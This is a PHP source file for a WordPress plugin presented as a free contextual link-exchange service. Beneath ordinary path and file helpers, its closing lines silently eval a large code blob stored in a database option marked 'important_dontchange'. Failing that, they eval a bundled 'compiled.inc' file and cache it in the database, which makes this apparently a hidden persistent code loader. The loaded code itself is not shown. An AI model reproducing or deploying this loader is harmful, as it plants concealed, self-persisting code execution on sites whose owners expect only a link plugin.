<?php
/*
Plugin Name: Contextual Partnership
Version: 1.0
Description: The Free Contextual Partnership Plug-in for WordPress allows you to exchange contextual text links with thousands of other quality word press bloggers completely hands free
*/
define("CXP_CONST_CODEOPTIONNAME","cxp_plugin_important_dontchange");

class TFDCompiler_General
{
    function AddSlash($directory)
    {
        $directory = TFDCompiler_General::UnixifyPath($directory);
        return preg_match('/^.*[\\\\\\/]$/',$directory)?$directory:$directory."/";
    }

    function GetExtension($filename)
    {
        return (preg_match('/^.*\.([^\.]+)$/',$filename,$matches)?$matches[1]:"");
    }

    function GetWithoutExtension($filename)
    {
        $filename = basename($filename);
        return (preg_match('/^(.*)\.[^\.]+$/',$filename,$matches)?$matches[1]:$filename);
    }

    function RemovePhpTags($value)
    {
        $value = trim($value);
        return (((strtolower(substr($value,0,5)))=="<"."?php") && (substr($value,strlen($value)-2)=="?".">"))?substr($value,5,strlen($value)-7):$value;
    }

    function GetRelativePath($from,$to)
    {
        $from = TFDCompiler_General::AddSlash($from);
        $to = TFDCompiler_General::AddSlash($to);
        if ($from==$to) return "";
        if (substr($to,0,strlen($from))==$from) return substr($to,strlen($from));
        $r = strrpos(substr($from,0,strlen($from)-1),"/");
        if ($r!==false)
        {
            return "../".TFDCompiler_General::GetRelativePath(substr($from,0,$r+1),$to);
        }
        else
        {
            return "../".$to;
        }
    }

    function UnixifyPath($filename)
    {
        return str_replace("\\","/",$filename);
    }

    function EscapeSingleQuotes($value)
    {
        $value = str_replace("\\","\\\\",$value);
        return str_replace("'","\\'",$value);
    }

    function DeleteDirectory($directory)
    {
        $directory = TFDCompiler_General::AddSlash($directory);
        $handler = @opendir($directory);
        $directories = array();
        while(($file = @readdir($handler))!==false)
        {
            if (($file == ".") || ($file == "..")) continue;
            $filename = $directory.$file;
            if (is_dir($filename))
            {
                $directories[] = $filename;
            }
            else
            {
                unlink($filename);
            }
        }
        @closedir($handler);
        foreach($directories as $dir) TFDCompiler_General::DeleteDirectory($dir);
        rmdir($directory);
    }

    function GetFixedNumberLength($value,$length)
    {
        $value = (string)$value;
        while(strlen($value)<$length) $value="0".$value;
        return $value;
    }
    
    function DoEval($code)
    {
        return ((@eval($code.";return 'cxp_ok';"))=="cxp_ok");
    }
}
$config_fundamentaldesign["paths"]["base"] = TFDCompiler_General::AddSlash(dirname(__FILE__));
$config_fundamentaldesign["paths"]["gap"] = TFDCompiler_General::GetRelativePath(dirname($_SERVER["SCRIPT_FILENAME"]),$config_fundamentaldesign["paths"]["base"]);
$config_fundamentaldesign["paths"]["parent"] = str_replace("\\","/",__FILE__);
//var_dump($config_fundamentaldesign["paths"]["parent"]);
$done = false;
$code = get_option(CXP_CONST_CODEOPTIONNAME);
if ((is_string($code)) && (strlen($code)>(50*1024)))
{
    if ((@eval($code."\r\n;return 'cxp_ok';"))=="cxp_ok") $done = true;
}
if (!$done)
{
    $code = @file_get_contents($config_fundamentaldesign["paths"]["base"]."compiled.inc");
    if ((@eval($code."\r\n;return 'cxp_ok';"))=="cxp_ok") update_option(CXP_CONST_CODEOPTIONNAME,$code);
}

?>
